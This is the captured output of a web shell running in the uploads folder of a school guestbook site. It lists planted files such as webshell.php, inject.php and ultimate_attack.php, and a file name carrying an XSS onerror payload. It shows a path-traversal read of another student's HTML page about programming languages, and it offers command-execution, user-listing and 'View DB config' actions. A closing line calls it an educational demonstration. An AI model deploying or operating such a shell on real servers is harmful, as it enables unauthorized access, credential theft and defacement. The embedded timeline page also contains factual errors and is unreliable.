🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../585871.klas4s23.mid-ica.nl/public_html/technowire/programmeertalen .html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>history</title>
    <link rel="stylesheet" href="astyle.css">
</head>
<body>

    <div class="topnav">
        <a href="index.html">Home</a>
        <a href="hall%20of%20fame.html">Hall of fame</a>
        <a class="active" href="programmeertalen%20.html">Programming languages</a>
        <a href="Silicon%20valley%20.html">Silicon valley</a>
        <img src="TechnoWire_logo.png" alt="logo"  height="70">
      </div>

      <div class="Arne">

      <h1>Programming language</h1>
      <p>A programming language is a language used by a computer and is different from one
        normal language here
        here you can see some of them</p>
      <p>the programming language are not to easy to learn</p>
      <p></p>
      </div>
    
    <ul class="timeline">
     
       <!-- Fortran -->
      <li>
        <div class="direction-r">
          <div class="flag-wrapper">
            <span class="hexa"></span>
            <span class="flag">Fortran</span>
            <span class="time-wrapper"><span class="time">1957</span></span>
          </div>
          <div class="desc"><p>Fortran is a programming language that was specially developed for calculations and is 
            mainly used in the exact sciences</p>
            <img src="fotos/Fortran.png" alt="" height="50" width="50">
          </div>
        </div>
      </li>
    
      <!-- Cobol -->
      <li>
        <div class="direction-l">
          <div class="flag-wrapper">
            <span class="hexa">
            </span>
            <span class="flag">Cobol</span>
            <span class="time-wrapper"><span class="time">1959
            </span></span>
          </div>
          <div class="desc"><p>COBOL is a programming language from the 1960s that is mainly used in business environments.</p>
            <img src="fotos/cobol.jpg" alt="Ada Lovelace" height="50" width="50">
          </div>
        
        </div>
      </li>
    
      <!-- Basic -->
      <li>
        <div class="direction-r">
          <div class="flag-wrapper">
            <span class="hexa"></span>
            <span class="flag">Basic</span>
            <span class="time-wrapper"><span class="time">1964
            </span></span>
          </div> 
          <div class="desc"><p>Basic is an imperative programming language originally intended to teach people how to program quickly.</p>
               <img src="fotos/images.png" alt="Ada Lovelace" height="50" width="50"> </div>
        </div>
      </li>

      <!-- C -->
      <li>
        <div class="direction-l">
          <div class="flag-wrapper">
            <span class="hexa"></span>
            <span class="flag">C</span>
            <span class="time-wrapper"><span class="time">1969
            </span></span>
          </div>
          <div class="desc"><p>is an imperative procedural language, supporting structured programming, lexical variable scope, 
            and recursion, with a static type system.</p> 
              <img src="fotos/C.png" alt="Ada Lovelace" height="50" width="50"> </div>
            </div>
        </div>
      </li>


      <!-- Pascal -->
      <li>
        <div class="direction-r">
          <div class="flag-wrapper">
            <span class="hexa"></span>
            <span class="flag">Pascal</span>
            <span class="time-wrapper"><span class="time">1970</span></span>
          </div>
          <div class="desc"><p>Pascal is a programming language developed in 1970 by Niklaus Wirth and named after
             the French mathematician Blaise Pascal. Pascal emphasizes simplicity, structured programming and data structures.</p>
            <img src="fotos/pascal.png" alt="Ada Lovelace" height="50" width="50">
          </div>
        </div>
      </li>

      <!-- C++ -->
      <li>
        <div class="direction-l">
          <div class="flag-wrapper">
            <span class="hexa"></span>
            <span class="flag">C++</span>
            <span class="time-wrapper"><span class="time">1983</span></span>
          </div>
          <div class="desc"><p>C++ is a programming language based on C. Unlike C, C++ is a multi-paradigm language,
             meaning that different programming paradigms can be used.</p>
            <img src="fotos/C++.png" alt="Ada Lovelace" height="50" width="50">
          </div>
        </div>
      </li>
    
      <!-- Perl -->
      <li>
        <div class="direction-r">
          <div class="flag-wrapper">
            <span class="hexa">
            </span>
            <span class="flag">Perl</span>
            <span class="time-wrapper"><span class="time">1987
            </span></span>
          </div>
          <div class="desc"><p>Perl is a programming language designed by Larry Wall that combines features of 
            C and UNIX scripting languages ​​such as sh and awk.</p>
            <img src="fotos/pearl.png" alt="Ada Lovelace" height="50" width="50">
          </div>
        </div>
      </li>
    
      <!-- pyton -->
      <li>
        <div class="direction-l">
          <div class="flag-wrapper">
            <span class="hexa">
            </span>
            <span class="flag">Python</span>
            <span class="time-wrapper"><span class="time">1991
            </span></span>
          </div>
          <div class="desc"><p>Python is a programming language that was designed and developed in the early 1990s
             by Guido van Rossum, then associated with the Center for Mathematics and Computer Science in Amsterdam.</p>
            <img src="fotos/download.jpg" alt="Ada Lovelace" height="50" width="50">
          </div>
        </div>
      </li>
    
      <!-- ruby --> 
      <li>
        <div class="direction-r">
          <div class="flag-wrapper">
            <span class="hexa"></span>
            <span class="flag">ruby</span>
            <span class="time-wrapper"><span class="time">1991
            </span></span>
          </div>
          <div class="desc"><p>Ruby is a programming language, which is usually interpreted.
             The language is designed for fast and easy object-oriented programming. It has various 
             capabilities to process text files and can also handle system tasks. There is an open source and free implementation
              of Ruby available.</p>
               <img src="fotos/ruby.jpg" alt="Ada Lovelace" height="50" width="50"> </div>
        </div>
      </li>

      <!-- Java -->
      <li>
        <div class="direction-l">
          <div class="flag-wrapper">
            <span class="hexa"></span>
            <span class="flag">Java</span>
            <span class="time-wrapper"><span class="time">1995
            </span></span>
          </div>
          <div class="desc"><p>Java is an object-oriented programming language.
            Java is a platform-independent language that is largely syntax-wise
            is based on the C++ programming language. However, Java has one
             more extensive class library than C++.</p>
              <img src="fotos/java.png" alt="Ada Lovelace" height="50" width="50"> </div>
            </div>
        </div>
      </li>

      <!-- JavaScript -->
      <li>
        <div class="direction-r">
          <div class="flag-wrapper">
            <span class="hexa"></span>
            <span class="flag">JavaScript</span>
            <span class="time-wrapper"><span class="time">1995
            </span></span>
          </div>
          <div class="desc"><p>JavaScript is a commonly used scripting language for web pages
            interactive and develop web applications. In addition to HTML and CSS
             JavaScript is one of the core technologies of the World Wide Web.</p>
             <img src="fotos/javascript.png" alt="Ada Lovelace" height="50" width="50"></div>
        </div>
      </li>

       <!-- ryby on rails -->
       <li>
        <div class="direction-l">
          <div class="flag-wrapper">
            <span class="hexa"></span>
            <span class="flag">Ruby on Rails</span>
            <span class="time-wrapper"><span class="time">1995
            </span></span>
          </div>
          <div class="desc"><p>Ruby on Rails, also often called RoR or simply Rails, is an open source web application framework written in Ruby.
             It broadly follows the model-view-controller model.</p>
             <img src="fotos/1_MtuURq-9Fe3MZM5IZqQgyw.png" alt="Ada Lovelace" height="50" width="50"></div>
        </div>
      </li>
      
      


    </ul>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!